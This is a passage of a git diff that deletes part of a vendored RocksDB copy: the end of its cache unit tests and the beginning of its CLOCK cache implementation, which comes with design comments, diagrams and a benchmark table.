-      pinned_usage -= kv_size;
-      ASSERT_EQ(pinned_usage, cache->GetPinnedUsage());
-    } else {
-      unreleased_handles.push_front(handle);
-    }
-    if (i % 3 == 0) {
-      unreleased_handles.push_front(cache->Lookup(key));
-      // If i % 2 == 0, then the entry was unpinned before Lookup, so pinned
-      // usage increased
-      if (i % 2 == 0) {
-        pinned_usage += kv_size;
-      }
-      ASSERT_EQ(pinned_usage, cache->GetPinnedUsage());
-    }
-  }
-
-  // check that overloading the cache does not change the pinned usage
-  for (uint64_t i = 1; i < 2 * kCapacity; ++i) {
-    auto key = ToString(i);
-    cache->Insert(key, reinterpret_cast<void*>(value), key.size() + 5,
-                  dumbDeleter);
-  }
-  ASSERT_EQ(pinned_usage, cache->GetPinnedUsage());
-
-  // release handles for pinned entries to prevent memory leaks
-  for (auto handle : unreleased_handles) {
-    cache->Release(handle);
-  }
-}
-
-TEST_P(CacheTest, HitAndMiss) {
-  ASSERT_EQ(-1, Lookup(100));
-
-  Insert(100, 101);
-  ASSERT_EQ(101, Lookup(100));
-  ASSERT_EQ(-1,  Lookup(200));
-  ASSERT_EQ(-1,  Lookup(300));
-
-  Insert(200, 201);
-  ASSERT_EQ(101, Lookup(100));
-  ASSERT_EQ(201, Lookup(200));
-  ASSERT_EQ(-1,  Lookup(300));
-
-  Insert(100, 102);
-  ASSERT_EQ(102, Lookup(100));
-  ASSERT_EQ(201, Lookup(200));
-  ASSERT_EQ(-1,  Lookup(300));
-
-  ASSERT_EQ(1U, deleted_keys_.size());
-  ASSERT_EQ(100, deleted_keys_[0]);
-  ASSERT_EQ(101, deleted_values_[0]);
-}
-
-TEST_P(CacheTest, InsertSameKey) {
-  Insert(1, 1);
-  Insert(1, 2);
-  ASSERT_EQ(2, Lookup(1));
-}
-
-TEST_P(CacheTest, Erase) {
-  Erase(200);
-  ASSERT_EQ(0U, deleted_keys_.size());
-
-  Insert(100, 101);
-  Insert(200, 201);
-  Erase(100);
-  ASSERT_EQ(-1,  Lookup(100));
-  ASSERT_EQ(201, Lookup(200));
-  ASSERT_EQ(1U, deleted_keys_.size());
-  ASSERT_EQ(100, deleted_keys_[0]);
-  ASSERT_EQ(101, deleted_values_[0]);
-
-  Erase(100);
-  ASSERT_EQ(-1,  Lookup(100));
-  ASSERT_EQ(201, Lookup(200));
-  ASSERT_EQ(1U, deleted_keys_.size());
-}
-
-TEST_P(CacheTest, EntriesArePinned) {
-  Insert(100, 101);
-  Cache::Handle* h1 = cache_->Lookup(EncodeKey(100));
-  ASSERT_EQ(101, DecodeValue(cache_->Value(h1)));
-  ASSERT_EQ(1U, cache_->GetUsage());
-
-  Insert(100, 102);
-  Cache::Handle* h2 = cache_->Lookup(EncodeKey(100));
-  ASSERT_EQ(102, DecodeValue(cache_->Value(h2)));
-  ASSERT_EQ(0U, deleted_keys_.size());
-  ASSERT_EQ(2U, cache_->GetUsage());
-
-  cache_->Release(h1);
-  ASSERT_EQ(1U, deleted_keys_.size());
-  ASSERT_EQ(100, deleted_keys_[0]);
-  ASSERT_EQ(101, deleted_values_[0]);
-  ASSERT_EQ(1U, cache_->GetUsage());
-
-  Erase(100);
-  ASSERT_EQ(-1, Lookup(100));
-  ASSERT_EQ(1U, deleted_keys_.size());
-  ASSERT_EQ(1U, cache_->GetUsage());
-
-  cache_->Release(h2);
-  ASSERT_EQ(2U, deleted_keys_.size());
-  ASSERT_EQ(100, deleted_keys_[1]);
-  ASSERT_EQ(102, deleted_values_[1]);
-  ASSERT_EQ(0U, cache_->GetUsage());
-}
-
-TEST_P(CacheTest, EvictionPolicy) {
-  Insert(100, 101);
-  Insert(200, 201);
-
-  // Frequently used entry must be kept around
-  for (int i = 0; i < kCacheSize + 100; i++) {
-    Insert(1000+i, 2000+i);
-    ASSERT_EQ(101, Lookup(100));
-  }
-  ASSERT_EQ(101, Lookup(100));
-  ASSERT_EQ(-1, Lookup(200));
-}
-
-TEST_P(CacheTest, ExternalRefPinsEntries) {
-  Insert(100, 101);
-  Cache::Handle* h = cache_->Lookup(EncodeKey(100));
-  ASSERT_TRUE(cache_->Ref(h));
-  ASSERT_EQ(101, DecodeValue(cache_->Value(h)));
-  ASSERT_EQ(1U, cache_->GetUsage());
-
-  for (int i = 0; i < 3; ++i) {
-    if (i > 0) {
-      // First release (i == 1) corresponds to Ref(), second release (i == 2)
-      // corresponds to Lookup(). Then, since all external refs are released,
-      // the below insertions should push out the cache entry.
-      cache_->Release(h);
-    }
-    // double cache size because the usage bit in block cache prevents 100 from
-    // being evicted in the first kCacheSize iterations
-    for (int j = 0; j < 2 * kCacheSize + 100; j++) {
-      Insert(1000 + j, 2000 + j);
-    }
-    if (i < 2) {
-      ASSERT_EQ(101, Lookup(100));
-    }
-  }
-  ASSERT_EQ(-1, Lookup(100));
-}
-
-TEST_P(CacheTest, EvictionPolicyRef) {
-  Insert(100, 101);
-  Insert(101, 102);
-  Insert(102, 103);
-  Insert(103, 104);
-  Insert(200, 101);
-  Insert(201, 102);
-  Insert(202, 103);
-  Insert(203, 104);
-  Cache::Handle* h201 = cache_->Lookup(EncodeKey(200));
-  Cache::Handle* h202 = cache_->Lookup(EncodeKey(201));
-  Cache::Handle* h203 = cache_->Lookup(EncodeKey(202));
-  Cache::Handle* h204 = cache_->Lookup(EncodeKey(203));
-  Insert(300, 101);
-  Insert(301, 102);
-  Insert(302, 103);
-  Insert(303, 104);
-
-  // Insert entries much more than Cache capacity
-  for (int i = 0; i < kCacheSize + 100; i++) {
-    Insert(1000 + i, 2000 + i);
-  }
-
-  // Check whether the entries inserted in the beginning
-  // are evicted. Ones without extra ref are evicted and
-  // those with are not.
-  ASSERT_EQ(-1, Lookup(100));
-  ASSERT_EQ(-1, Lookup(101));
-  ASSERT_EQ(-1, Lookup(102));
-  ASSERT_EQ(-1, Lookup(103));
-
-  ASSERT_EQ(-1, Lookup(300));
-  ASSERT_EQ(-1, Lookup(301));
-  ASSERT_EQ(-1, Lookup(302));
-  ASSERT_EQ(-1, Lookup(303));
-
-  ASSERT_EQ(101, Lookup(200));
-  ASSERT_EQ(102, Lookup(201));
-  ASSERT_EQ(103, Lookup(202));
-  ASSERT_EQ(104, Lookup(203));
-
-  // Cleaning up all the handles
-  cache_->Release(h201);
-  cache_->Release(h202);
-  cache_->Release(h203);
-  cache_->Release(h204);
-}
-
-TEST_P(CacheTest, EvictEmptyCache) {
-  // Insert item large than capacity to trigger eviction on empty cache.
-  auto cache = NewCache(1, 0, false);
-  ASSERT_OK(cache->Insert("foo", nullptr, 10, dumbDeleter));
-}
-
-TEST_P(CacheTest, EraseFromDeleter) {
-  // Have deleter which will erase item from cache, which will re-enter
-  // the cache at that point.
-  std::shared_ptr<Cache> cache = NewCache(10, 0, false);
-  ASSERT_OK(cache->Insert("foo", nullptr, 1, dumbDeleter));
-  ASSERT_OK(cache->Insert("bar", cache.get(), 1, eraseDeleter));
-  cache->Erase("bar");
-  ASSERT_EQ(nullptr, cache->Lookup("foo"));
-  ASSERT_EQ(nullptr, cache->Lookup("bar"));
-}
-
-TEST_P(CacheTest, ErasedHandleState) {
-  // insert a key and get two handles
-  Insert(100, 1000);
-  Cache::Handle* h1 = cache_->Lookup(EncodeKey(100));
-  Cache::Handle* h2 = cache_->Lookup(EncodeKey(100));
-  ASSERT_EQ(h1, h2);
-  ASSERT_EQ(DecodeValue(cache_->Value(h1)), 1000);
-  ASSERT_EQ(DecodeValue(cache_->Value(h2)), 1000);
-
-  // delete the key from the cache
-  Erase(100);
-  // can no longer find in the cache
-  ASSERT_EQ(-1, Lookup(100));
-
-  // release one handle
-  cache_->Release(h1);
-  // still can't find in cache
-  ASSERT_EQ(-1, Lookup(100));
-
-  cache_->Release(h2);
-}
-
-TEST_P(CacheTest, HeavyEntries) {
-  // Add a bunch of light and heavy entries and then count the combined
-  // size of items still in the cache, which must be approximately the
-  // same as the total capacity.
-  const int kLight = 1;
-  const int kHeavy = 10;
-  int added = 0;
-  int index = 0;
-  while (added < 2*kCacheSize) {
-    const int weight = (index & 1) ? kLight : kHeavy;
-    Insert(index, 1000+index, weight);
-    added += weight;
-    index++;
-  }
-
-  int cached_weight = 0;
-  for (int i = 0; i < index; i++) {
-    const int weight = (i & 1 ? kLight : kHeavy);
-    int r = Lookup(i);
-    if (r >= 0) {
-      cached_weight += weight;
-      ASSERT_EQ(1000+i, r);
-    }
-  }
-  ASSERT_LE(cached_weight, kCacheSize + kCacheSize/10);
-}
-
-TEST_P(CacheTest, NewId) {
-  uint64_t a = cache_->NewId();
-  uint64_t b = cache_->NewId();
-  ASSERT_NE(a, b);
-}
-
-
-class Value {
- public:
-  explicit Value(size_t v) : v_(v) { }
-
-  size_t v_;
-};
-
-namespace {
-void deleter(const Slice& key, void* value) {
-  delete static_cast<Value *>(value);
-}
-}  // namespace
-
-TEST_P(CacheTest, ReleaseAndErase) {
-  std::shared_ptr<Cache> cache = NewCache(5, 0, false);
-  Cache::Handle* handle;
-  Status s = cache->Insert(EncodeKey(100), EncodeValue(100), 1,
-                           &CacheTest::Deleter, &handle);
-  ASSERT_TRUE(s.ok());
-  ASSERT_EQ(5U, cache->GetCapacity());
-  ASSERT_EQ(1U, cache->GetUsage());
-  ASSERT_EQ(0U, deleted_keys_.size());
-  auto erased = cache->Release(handle, true);
-  ASSERT_TRUE(erased);
-  // This tests that deleter has been called
-  ASSERT_EQ(1U, deleted_keys_.size());
-}
-
-TEST_P(CacheTest, ReleaseWithoutErase) {
-  std::shared_ptr<Cache> cache = NewCache(5, 0, false);
-  Cache::Handle* handle;
-  Status s = cache->Insert(EncodeKey(100), EncodeValue(100), 1,
-                           &CacheTest::Deleter, &handle);
-  ASSERT_TRUE(s.ok());
-  ASSERT_EQ(5U, cache->GetCapacity());
-  ASSERT_EQ(1U, cache->GetUsage());
-  ASSERT_EQ(0U, deleted_keys_.size());
-  auto erased = cache->Release(handle);
-  ASSERT_FALSE(erased);
-  // This tests that deleter is not called. When cache has free capacity it is
-  // not expected to immediately erase the released items.
-  ASSERT_EQ(0U, deleted_keys_.size());
-}
-
-TEST_P(CacheTest, SetCapacity) {
-  // test1: increase capacity
-  // lets create a cache with capacity 5,
-  // then, insert 5 elements, then increase capacity
-  // to 10, returned capacity should be 10, usage=5
-  std::shared_ptr<Cache> cache = NewCache(5, 0, false);
-  std::vector<Cache::Handle*> handles(10);
-  // Insert 5 entries, but not releasing.
-  for (size_t i = 0; i < 5; i++) {
-    std::string key = ToString(i+1);
-    Status s = cache->Insert(key, new Value(i + 1), 1, &deleter, &handles[i]);
-    ASSERT_TRUE(s.ok());
-  }
-  ASSERT_EQ(5U, cache->GetCapacity());
-  ASSERT_EQ(5U, cache->GetUsage());
-  cache->SetCapacity(10);
-  ASSERT_EQ(10U, cache->GetCapacity());
-  ASSERT_EQ(5U, cache->GetUsage());
-
-  // test2: decrease capacity
-  // insert 5 more elements to cache, then release 5,
-  // then decrease capacity to 7, final capacity should be 7
-  // and usage should be 7
-  for (size_t i = 5; i < 10; i++) {
-    std::string key = ToString(i+1);
-    Status s = cache->Insert(key, new Value(i + 1), 1, &deleter, &handles[i]);
-    ASSERT_TRUE(s.ok());
-  }
-  ASSERT_EQ(10U, cache->GetCapacity());
-  ASSERT_EQ(10U, cache->GetUsage());
-  for (size_t i = 0; i < 5; i++) {
-    cache->Release(handles[i]);
-  }
-  ASSERT_EQ(10U, cache->GetCapacity());
-  ASSERT_EQ(10U, cache->GetUsage());
-  cache->SetCapacity(7);
-  ASSERT_EQ(7, cache->GetCapacity());
-  ASSERT_EQ(7, cache->GetUsage());
-
-  // release remaining 5 to keep valgrind happy
-  for (size_t i = 5; i < 10; i++) {
-    cache->Release(handles[i]);
-  }
-}
-
-TEST_P(CacheTest, SetStrictCapacityLimit) {
-  // test1: set the flag to false. Insert more keys than capacity. See if they
-  // all go through.
-  std::shared_ptr<Cache> cache = NewLRUCache(5, 0, false);
-  std::vector<Cache::Handle*> handles(10);
-  Status s;
-  for (size_t i = 0; i < 10; i++) {
-    std::string key = ToString(i + 1);
-    s = cache->Insert(key, new Value(i + 1), 1, &deleter, &handles[i]);
-    ASSERT_OK(s);
-    ASSERT_NE(nullptr, handles[i]);
-  }
-
-  // test2: set the flag to true. Insert and check if it fails.
-  std::string extra_key = "extra";
-  Value* extra_value = new Value(0);
-  cache->SetStrictCapacityLimit(true);
-  Cache::Handle* handle;
-  s = cache->Insert(extra_key, extra_value, 1, &deleter, &handle);
-  ASSERT_TRUE(s.IsIncomplete());
-  ASSERT_EQ(nullptr, handle);
-
-  for (size_t i = 0; i < 10; i++) {
-    cache->Release(handles[i]);
-  }
-
-  // test3: init with flag being true.
-  std::shared_ptr<Cache> cache2 = NewLRUCache(5, 0, true);
-  for (size_t i = 0; i < 5; i++) {
-    std::string key = ToString(i + 1);
-    s = cache2->Insert(key, new Value(i + 1), 1, &deleter, &handles[i]);
-    ASSERT_OK(s);
-    ASSERT_NE(nullptr, handles[i]);
-  }
-  s = cache2->Insert(extra_key, extra_value, 1, &deleter, &handle);
-  ASSERT_TRUE(s.IsIncomplete());
-  ASSERT_EQ(nullptr, handle);
-  // test insert without handle
-  s = cache2->Insert(extra_key, extra_value, 1, &deleter);
-  // AS if the key have been inserted into cache but get evicted immediately.
-  ASSERT_OK(s);
-  ASSERT_EQ(5, cache->GetUsage());
-  ASSERT_EQ(nullptr, cache2->Lookup(extra_key));
-
-  for (size_t i = 0; i < 5; i++) {
-    cache2->Release(handles[i]);
-  }
-}
-
-TEST_P(CacheTest, OverCapacity) {
-  size_t n = 10;
-
-  // a LRUCache with n entries and one shard only
-  std::shared_ptr<Cache> cache = NewCache(n, 0, false);
-
-  std::vector<Cache::Handle*> handles(n+1);
-
-  // Insert n+1 entries, but not releasing.
-  for (size_t i = 0; i < n + 1; i++) {
-    std::string key = ToString(i+1);
-    Status s = cache->Insert(key, new Value(i + 1), 1, &deleter, &handles[i]);
-    ASSERT_TRUE(s.ok());
-  }
-
-  // Guess what's in the cache now?
-  for (size_t i = 0; i < n + 1; i++) {
-    std::string key = ToString(i+1);
-    auto h = cache->Lookup(key);
-    ASSERT_TRUE(h != nullptr);
-    if (h) cache->Release(h);
-  }
-
-  // the cache is over capacity since nothing could be evicted
-  ASSERT_EQ(n + 1U, cache->GetUsage());
-  for (size_t i = 0; i < n + 1; i++) {
-    cache->Release(handles[i]);
-  }
-  // Make sure eviction is triggered.
-  cache->SetCapacity(n);
-
-  // cache is under capacity now since elements were released
-  ASSERT_EQ(n, cache->GetUsage());
-
-  // element 0 is evicted and the rest is there
-  // This is consistent with the LRU policy since the element 0
-  // was released first
-  for (size_t i = 0; i < n + 1; i++) {
-    std::string key = ToString(i+1);
-    auto h = cache->Lookup(key);
-    if (h) {
-      ASSERT_NE(i, 0U);
-      cache->Release(h);
-    } else {
-      ASSERT_EQ(i, 0U);
-    }
-  }
-}
-
-namespace {
-std::vector<std::pair<int, int>> callback_state;
-void callback(void* entry, size_t charge) {
-  callback_state.push_back({DecodeValue(entry), static_cast<int>(charge)});
-}
-};
-
-TEST_P(CacheTest, ApplyToAllCacheEntiresTest) {
-  std::vector<std::pair<int, int>> inserted;
-  callback_state.clear();
-
-  for (int i = 0; i < 10; ++i) {
-    Insert(i, i * 2, i + 1);
-    inserted.push_back({i * 2, i + 1});
-  }
-  cache_->ApplyToAllCacheEntries(callback, true);
-
-  std::sort(inserted.begin(), inserted.end());
-  std::sort(callback_state.begin(), callback_state.end());
-  ASSERT_TRUE(inserted == callback_state);
-}
-
-TEST_P(CacheTest, DefaultShardBits) {
-  // test1: set the flag to false. Insert more keys than capacity. See if they
-  // all go through.
-  std::shared_ptr<Cache> cache = NewCache(16 * 1024L * 1024L);
-  ShardedCache* sc = dynamic_cast<ShardedCache*>(cache.get());
-  ASSERT_EQ(5, sc->GetNumShardBits());
-
-  cache = NewLRUCache(511 * 1024L, -1, true);
-  sc = dynamic_cast<ShardedCache*>(cache.get());
-  ASSERT_EQ(0, sc->GetNumShardBits());
-
-  cache = NewLRUCache(1024L * 1024L * 1024L, -1, true);
-  sc = dynamic_cast<ShardedCache*>(cache.get());
-  ASSERT_EQ(6, sc->GetNumShardBits());
-}
-
-#ifdef SUPPORT_CLOCK_CACHE
-shared_ptr<Cache> (*new_clock_cache_func)(size_t, int, bool) = NewClockCache;
-INSTANTIATE_TEST_CASE_P(CacheTestInstance, CacheTest,
-                        testing::Values(kLRU, kClock));
-#else
-INSTANTIATE_TEST_CASE_P(CacheTestInstance, CacheTest, testing::Values(kLRU));
-#endif  // SUPPORT_CLOCK_CACHE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/cache/clock_cache.cc b/thirdparty/rocksdb/cache/clock_cache.cc
deleted file mode 100644
index 7e42714..0000000
--- a/thirdparty/rocksdb/cache/clock_cache.cc
+++ /dev/null
@@ -1,729 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "cache/clock_cache.h"
-
-#ifndef SUPPORT_CLOCK_CACHE
-
-namespace rocksdb {
-
-std::shared_ptr<Cache> NewClockCache(size_t capacity, int num_shard_bits,
-                                     bool strict_capacity_limit) {
-  // Clock cache not supported.
-  return nullptr;
-}
-
-}  // namespace rocksdb
-
-#else
-
-#include <assert.h>
-#include <atomic>
-#include <deque>
-
-// "tbb/concurrent_hash_map.h" requires RTTI if exception is enabled.
-// Disable it so users can chooose to disable RTTI.
-#ifndef ROCKSDB_USE_RTTI
-#define TBB_USE_EXCEPTIONS 0
-#endif
-#include "tbb/concurrent_hash_map.h"
-
-#include "cache/sharded_cache.h"
-#include "port/port.h"
-#include "util/autovector.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-namespace {
-
-// An implementation of the Cache interface based on CLOCK algorithm, with
-// better concurrent performance than LRUCache. The idea of CLOCK algorithm
-// is to maintain all cache entries in a circular list, and an iterator
-// (the "head") pointing to the last examined entry. Eviction starts from the
-// current head. Each entry is given a second chance before eviction, if it
-// has been access since last examine. In contrast to LRU, no modification
-// to the internal data-structure (except for flipping the usage bit) needs
-// to be done upon lookup. This gives us oppertunity to implement a cache
-// with better concurrency.
-//
-// Each cache entry is represented by a cache handle, and all the handles
-// are arranged in a circular list, as describe above. Upon erase of an entry,
-// we never remove the handle. Instead, the handle is put into a recycle bin
-// to be re-use. This is to avoid memory dealocation, which is hard to deal
-// with in concurrent environment.
-//
-// The cache also maintains a concurrent hash map for lookup. Any concurrent
-// hash map implementation should do the work. We currently use
-// tbb::concurrent_hash_map because it supports concurrent erase.
-//
-// Each cache handle has the following flags and counters, which are squeeze
-// in an atomic interger, to make sure the handle always be in a consistent
-// state:
-//
-//   * In-cache bit: whether the entry is reference by the cache itself. If
-//     an entry is in cache, its key would also be available in the hash map.
-//   * Usage bit: whether the entry has been access by user since last
-//     examine for eviction. Can be reset by eviction.
-//   * Reference count: reference count by user.
-//
-// An entry can be reference only when it's in cache. An entry can be evicted
-// only when it is in cache, has no usage since last examine, and reference
-// count is zero.
-//
-// The follow figure shows a possible layout of the cache. Boxes represents
-// cache handles and numbers in each box being in-cache bit, usage bit and
-// reference count respectively.
-//
-//    hash map:
-//      +-------+--------+
-//      |  key  | handle |
-//      +-------+--------+
-//      | "foo" |    5   |-------------------------------------+
-//      +-------+--------+                                     |
-//      | "bar" |    2   |--+                                  |
-//      +-------+--------+  |                                  |
-//                          |                                  |
-//                     head |                                  |
-//                       |  |                                  |
-//    circular list:     |  |                                  |
-//         +-------+   +-------+   +-------+   +-------+   +-------+   +-------
-//         |(0,0,0)|---|(1,1,0)|---|(0,0,0)|---|(0,1,3)|---|(1,0,0)|---|  ...
-//         +-------+   +-------+   +-------+   +-------+   +-------+   +-------
-//             |                       |
-//             +-------+   +-----------+
-//                     |   |
-//                   +---+---+
-//    recycle bin:   | 1 | 3 |
-//                   +---+---+
-//
-// Suppose we try to insert "baz" into the cache at this point and the cache is
-// full. The cache will first look for entries to evict, starting from where
-// head points to (the second entry). It resets usage bit of the second entry,
-// skips the third and fourth entry since they are not in cache, and finally
-// evict the fifth entry ("foo"). It looks at recycle bin for available handle,
-// grabs handle 3, and insert the key into the handle. The following figure
-// shows the resulting layout.
-//
-//    hash map:
-//      +-------+--------+
-//      |  key  | handle |
-//      +-------+--------+
-//      | "baz" |    3   |-------------+
-//      +-------+--------+             |
-//      | "bar" |    2   |--+          |
-//      +-------+--------+  |          |
-//                          |          |
-//                          |          |                                 head
-//                          |          |                                   |
-//    circular list:        |          |                                   |
-//         +-------+   +-------+   +-------+   +-------+   +-------+   +-------
-//         |(0,0,0)|---|(1,0,0)|---|(1,0,0)|---|(0,1,3)|---|(0,0,0)|---|  ...
-//         +-------+   +-------+   +-------+   +-------+   +-------+   +-------
-//             |                                               |
-//             +-------+   +-----------------------------------+
-//                     |   |
-//                   +---+---+
-//    recycle bin:   | 1 | 5 |
-//                   +---+---+
-//
-// A global mutex guards the circular list, the head, and the recycle bin.
-// We additionally require that modifying the hash map needs to hold the mutex.
-// As such, Modifying the cache (such as Insert() and Erase()) require to
-// hold the mutex. Lookup() only access the hash map and the flags associated
-// with each handle, and don't require explicit locking. Release() has to
-// acquire the mutex only when it releases the last reference to the entry and
-// the entry has been erased from cache explicitly. A future improvement could
-// be to remove the mutex completely.
-//
-// Benchmark:
-// We run readrandom db_bench on a test DB of size 13GB, with size of each
-// level:
-//
-//    Level    Files   Size(MB)
-//    -------------------------
-//      L0        1       0.01
-//      L1       18      17.32
-//      L2      230     182.94
-//      L3     1186    1833.63
-//      L4     4602    8140.30
-//
-// We test with both 32 and 16 read threads, with 2GB cache size (the whole DB
-// doesn't fits in) and 64GB cache size (the whole DB can fit in cache), and
-// whether to put index and filter blocks in block cache. The benchmark runs
-// with
-// with RocksDB 4.10. We got the following result:
-//
-// Threads Cache     Cache               ClockCache               LRUCache
-//         Size  Index/Filter Throughput(MB/s)   Hit Throughput(MB/s)    Hit
-//     32   2GB       yes               466.7  85.9%           433.7   86.5%
-//     32   2GB       no                529.9  72.7%           532.7   73.9%
-//     32  64GB       yes               649.9  99.9%           507.9   99.9%
-//     32  64GB       no                740.4  99.9%           662.8   99.9%
-//     16   2GB       yes               278.4  85.9%           283.4   86.5%
-//     16   2GB       no                318.6  72.7%           335.8   73.9%
-//     16  64GB       yes               391.9  99.9%           353.3   99.9%
-//     16  64GB       no                433.8  99.8%           419.4   99.8%
-
-// Cache entry meta data.
-struct CacheHandle {
-  Slice key;
-  uint32_t hash;
-  void* value;
-  size_t charge;
-  void (*deleter)(const Slice&, void* value);
-
-  // Flags and counters associated with the cache handle:
-  //   lowest bit: n-cache bit
-  //   second lowest bit: usage bit
-  //   the rest bits: reference count
-  // The handle is unused when flags equals to 0. The thread decreases the count
-  // to 0 is responsible to put the handle back to recycle_ and cleanup memory.
-  std::atomic<uint32_t> flags;
-
-  CacheHandle() = default;
-
-  CacheHandle(const CacheHandle& a) { *this = a; }
-
-  CacheHandle(const Slice& k, void* v,
-              void (*del)(const Slice& key, void* value))
-      : key(k), value(v), deleter(del) {}
-
-  CacheHandle& operator=(const CacheHandle& a) {
-    // Only copy members needed for deletion.
-    key = a.key;
-    value = a.value;
-    deleter = a.deleter;
-    return *this;
-  }
-};
-
-// Key of hash map. We store hash value with the key for convenience.
-struct CacheKey {
-  Slice key;
-  uint32_t hash_value;
-
-  CacheKey() = default;
-
-  CacheKey(const Slice& k, uint32_t h) {
-    key = k;
-    hash_value = h;
-  }
-
-  static bool equal(const CacheKey& a, const CacheKey& b) {
-    return a.hash_value == b.hash_value && a.key == b.key;
-  }
-
-  static size_t hash(const CacheKey& a) {
-    return static_cast<size_t>(a.hash_value);
-  }
-};
-
-struct CleanupContext {
-  // List of values to be deleted, along with the key and deleter.
-  autovector<CacheHandle> to_delete_value;
-
-  // List of keys to be deleted.
-  autovector<const char*> to_delete_key;
-};
-
-// A cache shard which maintains its own CLOCK cache.
-class ClockCacheShard : public CacheShard {
- public:
-  // Hash map type.
-  typedef tbb::concurrent_hash_map<CacheKey, CacheHandle*, CacheKey> HashTable;
-
-  ClockCacheShard();
-  ~ClockCacheShard();
-
-  // Interfaces
-  virtual void SetCapacity(size_t capacity) override;
-  virtual void SetStrictCapacityLimit(bool strict_capacity_limit) override;
-  virtual Status Insert(const Slice& key, uint32_t hash, void* value,
-                        size_t charge,
-                        void (*deleter)(const Slice& key, void* value),
-                        Cache::Handle** handle,
-                        Cache::Priority priority) override;
-  virtual Cache::Handle* Lookup(const Slice& key, uint32_t hash) override;
-  // If the entry in in cache, increase reference count and return true.
-  // Return false otherwise.
-  //
-  // Not necessary to hold mutex_ before being called.
-  virtual bool Ref(Cache::Handle* handle) override;
-  virtual bool Release(Cache::Handle* handle,
-                       bool force_erase = false) override;
-  virtual void Erase(const Slice& key, uint32_t hash) override;
-  bool EraseAndConfirm(const Slice& key, uint32_t hash,
-                       CleanupContext* context);
-  virtual size_t GetUsage() const override;
-  virtual size_t GetPinnedUsage() const override;
-  virtual void EraseUnRefEntries() override;
-  virtual void ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                      bool thread_safe) override;
-
- private:
-  static const uint32_t kInCacheBit = 1;
-  static const uint32_t kUsageBit = 2;
-  static const uint32_t kRefsOffset = 2;
-  static const uint32_t kOneRef = 1 << kRefsOffset;
-
-  // Helper functions to extract cache handle flags and counters.
-  static bool InCache(uint32_t flags) { return flags & kInCacheBit; }
-  static bool HasUsage(uint32_t flags) { return flags & kUsageBit; }
-  static uint32_t CountRefs(uint32_t flags) { return flags >> kRefsOffset; }
-
-  // Decrease reference count of the entry. If this decreases the count to 0,
-  // recycle the entry. If set_usage is true, also set the usage bit.
-  //
-  // returns true if a value is erased.
-  //
-  // Not necessary to hold mutex_ before being called.
-  bool Unref(CacheHandle* handle, bool set_usage, CleanupContext* context);
-
-  // Unset in-cache bit of the entry. Recycle the handle if necessary.
-  //
-  // returns true if a value is erased.
-  //
-  // Has to hold mutex_ before being called.
-  bool UnsetInCache(CacheHandle* handle, CleanupContext* context);
-
-  // Put the handle back to recycle_ list, and put the value associated with
-  // it into to-be-deleted list. It doesn't cleanup the key as it might be
-  // reused by another handle.
-  //
-  // Has to hold mutex_ before being called.
-  void RecycleHandle(CacheHandle* handle, CleanupContext* context);
-
-  // Delete keys and values in to-be-deleted list. Call the method without
-  // holding mutex, as destructors can be expensive.
-  void Cleanup(const CleanupContext& context);
-
-  // Examine the handle for eviction. If the handle is in cache, usage bit is
-  // not set, and referece count is 0, evict it from cache. Otherwise unset
-  // the usage bit.
-  //
-  // Has to hold mutex_ before being called.
-  bool TryEvict(CacheHandle* value, CleanupContext* context);
-
-  // Scan through the circular list, evict entries until we get enough capacity
-  // for new cache entry of specific size. Return true if success, false
-  // otherwise.
-  //
-  // Has to hold mutex_ before being called.
-  bool EvictFromCache(size_t charge, CleanupContext* context);
-
-  CacheHandle* Insert(const Slice& key, uint32_t hash, void* value,
-                      size_t change,
-                      void (*deleter)(const Slice& key, void* value),
-                      bool hold_reference, CleanupContext* context);
-
-  // Guards list_, head_, and recycle_. In addition, updating table_ also has
-  // to hold the mutex, to avoid the cache being in inconsistent state.
-  mutable port::Mutex mutex_;
-
-  // The circular list of cache handles. Initially the list is empty. Once a
-  // handle is needed by insertion, and no more handles are available in
-  // recycle bin, one more handle is appended to the end.
-  //
-  // We use std::deque for the circular list because we want to make sure
-  // pointers to handles are valid through out the life-cycle of the cache
-  // (in contrast to std::vector), and be able to grow the list (in contrast
-  // to statically allocated arrays).
-  std::deque<CacheHandle> list_;
-
-  // Pointer to the next handle in the circular list to be examine for
-  // eviction.
-  size_t head_;
-
-  // Recycle bin of cache handles.
-  autovector<CacheHandle*> recycle_;
-
-  // Maximum cache size.
-  std::atomic<size_t> capacity_;
-
-  // Current total size of the cache.
-  std::atomic<size_t> usage_;
-
-  // Total un-released cache size.
-  std::atomic<size_t> pinned_usage_;
-
-  // Whether allow insert into cache if cache is full.
-  std::atomic<bool> strict_capacity_limit_;
-
-  // Hash table (tbb::concurrent_hash_map) for lookup.
-  HashTable table_;
-};
-
-ClockCacheShard::ClockCacheShard()
-    : head_(0), usage_(0), pinned_usage_(0), strict_capacity_limit_(false) {}
-
-ClockCacheShard::~ClockCacheShard() {
-  for (auto& handle : list_) {
-    uint32_t flags = handle.flags.load(std::memory_order_relaxed);
-    if (InCache(flags) || CountRefs(flags) > 0) {
-      (*handle.deleter)(handle.key, handle.value);
-      delete[] handle.key.data();
-    }
-  }
-}
-
-size_t ClockCacheShard::GetUsage() const {
-  return usage_.load(std::memory_order_relaxed);
-}
-
-size_t ClockCacheShard::GetPinnedUsage() const {
-  return pinned_usage_.load(std::memory_order_relaxed);
-}
-
-void ClockCacheShard::ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                             bool thread_safe) {
-  if (thread_safe) {
-    mutex_.Lock();
-  }
-  for (auto& handle : list_) {
-    // Use relaxed semantics instead of acquire semantics since we are either
-    // holding mutex, or don't have thread safe requirement.
-    uint32_t flags = handle.flags.load(std::memory_order_relaxed);
-    if (InCache(flags)) {
-      callback(handle.value, handle.charge);
-    }
-  }
-  if (thread_safe) {
-    mutex_.Unlock();
-  }
-}
-
-void ClockCacheShard::RecycleHandle(CacheHandle* handle,
-                                    CleanupContext* context) {
-  mutex_.AssertHeld();
